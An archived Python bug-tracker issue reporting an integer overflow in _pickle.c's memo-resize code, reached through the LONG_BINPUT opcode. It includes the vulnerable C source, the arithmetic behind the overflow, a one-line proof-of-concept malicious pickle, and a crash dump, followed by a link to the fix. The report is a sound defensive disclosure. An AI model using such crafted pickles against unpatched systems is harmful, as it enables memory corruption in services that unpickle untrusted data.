Movatterモバイル変換

Issue24521

➜

This issue trackerhas been migrated toGitHub, and is currentlyread-only.
For more information, see the GitHub FAQs in the Python's Developer Guide.

This issue has been migrated to GitHub: https://github.com/python/cpython/issues/68709

classification

Title:	Integer overflow in _pickle.c
Type:	crash	Stage:
Components:	Extension Modules	Versions:	Python 3.6, Python 3.3, Python 3.4, Python 3.5

process

Status:	closed	Resolution:	fixed
Dependencies:		Superseder:
Assigned To:		Nosy List:	Arfrever, benjamin.peterson
Priority:	normal	Keywords:

Created on2015-06-27 19:24 bybenjamin.peterson, last changed2022-04-11 14:58 byadmin. This issue is nowclosed.

Messages (2)
msg245888 -(view)	Author: Benjamin Peterson (benjamin.peterson)*	Date: 2015-06-27 19:24
Reported by Kurucsai Istvan on the security list:I. SummaryThere is an integer overflow in the _Unpickler_ResizeMemoList function in _pickle.c. It is reachable e.g. via the LONG_BINPUT opcode.II. Source codeThe functions in question:static intload_long_binput(UnpicklerObject self){ PyObject value; Py_ssize_t idx; char s; if (_Unpickler_Read(self, &s, 4) < 0) return -1; <<SNIP>> idx = calc_binsize(s, 4);1. if (idx < 0) { PyErr_SetString(PyExc_ValueError, "negative LONG_BINPUT argument"); return -1; } return _Unpickler_MemoPut(self, idx, value);}static int_Unpickler_MemoPut(UnpicklerObject self, Py_ssize_t idx, PyObject value){ PyObject old_item; if (idx >= self->memo_size) {2. if (_Unpickler_ResizeMemoList(self, idx * 2) < 0) return -1; assert(idx < self->memo_size); } <<SNIP>>}static int_Unpickler_ResizeMemoList(UnpicklerObject self, Py_ssize_t new_size){ <<SNIP>>3. memo = PyMem_REALLOC(self->memo, new_size sizeof(PyObject )); if (memo == NULL) { PyErr_NoMemory(); return -1; } self->memo = memo;4. for (i = self->memo_size; i < new_size; i++) self->memo[i] = NULL; self->memo_size = new_size; return 0;}1. 0 < idx < PY_SSIZE_T_MAX, we choose idx = 0x200000002. and 3. together multiply idx by 8 on a 32 bit arch, 0x20000000 8 wraps to 0.4. buffer overflowIII. Proof of conceptThe bug can be triggered using the following pickle:d:\Python34\python.exe -m pickletools G:\dump\python\memo1 0: I INT 1 3: r LONG_BINPUT 536870912 8: . STOPhighest protocol among opcodes = 1Running the following causes the crash below (also tested on 3.5.0b2).Python 3.4.3 (v3.4.3:9b73f1c3e601, Feb 24 2015, 22:43:06) [MSC v.1600 32 bit (Intel)] on win32Type "help", "copyright", "credits" or "license" for more information.>>> import pickle>>> pickle.loads(b'I1\nr\x00\x00\x00\x20\x2e')(1600.2664): Access violation - code c0000005 (first chance)First chance exceptions are reported before any exception handling.This exception may be expected and handled.eax=0000d3c4 ebx=1d84d1d0 ecx=778c28ac edx=01e700f0 esi=001f8a48 edi=40000000eip=1d5ce5d3 esp=0057f65c ebp=0057f668 iopl=0 nv up ei ng nz na po cycs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010283python34!_Unpickler_ResizeMemoList+0x33:1d5ce5d3 c7048200000000 mov dword ptr [edx+eax*4],0 ds:002b:01ea5000=????????0:000> kbChildEBP RetAddr Args to Child 0057f658 1d5ce627 00301ff4 00000004 0057f684 python34!_Unpickler_ResizeMemoList+0x33 [c:\users\martin\34\python\modules\_pickle.c @ 1275]0057f668 1d5d3503 20000000 00301ff3 001f8a48 python34!_Unpickler_MemoPut+0x17 [c:\users\martin\34\python\modules\_pickle.c @ 1298]0057f684 1d5d4027 001f8a48 0059b440 001f8a48 python34!load_long_binput+0x73 [c:\users\martin\34\python\modules\_pickle.c @ 5653]0057f6a0 1d5d4e44 0059b440 00000000 0057f6dc python34!load+0x2c7 [c:\users\martin\34\python\modules\_pickle.c @ 6134]0057f6b0 1d5d5461 00301fe0 00000001 1d6ff9d0 python34!_pickle_loads_impl+0x54 [c:\users\martin\34\python\modules\_pickle.c @ 7060]0057f6dc 1d674f15 00597780 002cf6b0 00000000 python34!_pickle_loads+0x61 [c:\users\martin\34\python\modules\clinic\_pickle.c.h @ 540]0057f6fc 1d6c591f 0059b440 002cf6b0 00000000 python34!PyCFunction_Call+0x65 [c:\users\martin\34\python\objects\methodobject.c @ 99]0057f72c 1d6c79d9 0057f760 00000000 002d1d40 python34!call_function+0x28f [c:\users\martin\34\python\python\ceval.c @ 4237]0057f7a0 1d6c89fd 002ff7b0 00000000 01e55958 python34!PyEval_EvalFrameEx+0x1ff9 [c:\users\martin\34\python\python\ceval.c @ 2840]0057f7dc 1d6c8b64 002d1d40 002ff7b0 002960f8 python34!PyEval_EvalCodeEx+0x55d [c:\users\martin\34\python\python\ceval.c @ 3588]0057f810 1d6f1f7d 002d1d40 002960f8 002960f8 python34!PyEval_EvalCode+0x24 [c:\users\martin\34\python\python\ceval.c @ 780]0057f82c 1d6f39fd 01e5e098 002960f8 002960f8 python34!run_mod+0x2d [c:\users\martin\34\python\python\pythonrun.c @ 2180]0057f868 1d6f4520 703c3008 0030a728 0057f8f4 python34!PyRun_InteractiveOneObject+0x25d [c:\users\martin\34\python\python\pythonrun.c @ 1446]0057f88c 1d6f459d 703c3008 1d706acc 0057f8f4 python34!PyRun_InteractiveLoopFlags+0xc0 [c:\users\martin\34\python\python\pythonrun.c @ 1324]0057f8a8 1d5fdc75 703c3008 1d706acc 00000000 python34!PyRun_AnyFileExFlags+0x2d [c:\users\martin\34\python\python\pythonrun.c @ 1286]0057f8c8 1d5fe336 703c3008 0057f8f4 1cd73378 python34!run_file+0x95 [c:\users\martin\34\python\modules\main.c @ 319]0057f940 1cd71184 00000001 01fd1420 01fd5be8 python34!Py_Main+0x696 [c:\users\martin\34\python\modules\main.c @ 751]0057f984 7621337a 7efde000 0057f9d0 778b92e2 python!__tmainCRTStartup+0x122 [f:\dd\vctools\crt_bld\self_x86\crt\src\crtexe.c @ 552]0057f990 778b92e2 7efde000 2345c114 00000000 kernel32!BaseThreadInitThunk+0xe0057f9d0 778b92b5 1cd712ec 7efde000 00000000 ntdll!__RtlUserThreadStart+0x700057f9e8 00000000 1cd712ec 7efde000 00000000 ntdll!_RtlUserThreadStart+0x1b
msg245889 -(view)	Author: Benjamin Peterson (benjamin.peterson)*	Date: 2015-06-27 19:26
https://hg.python.org/cpython/rev/acd5c9118931

History
Date	User	Action	Args
2022-04-11 14:58:18	admin	set	github: 68709
2015-06-28 12:41:56	Arfrever	set	nosy: +Arfrever
2015-06-27 19:27:00	benjamin.peterson	set	status: open -> closed resolution: fixed messages: +msg245889
2015-06-27 19:24:48	benjamin.peterson	create

Supported byThe Python Software Foundation,
Powered byRoundup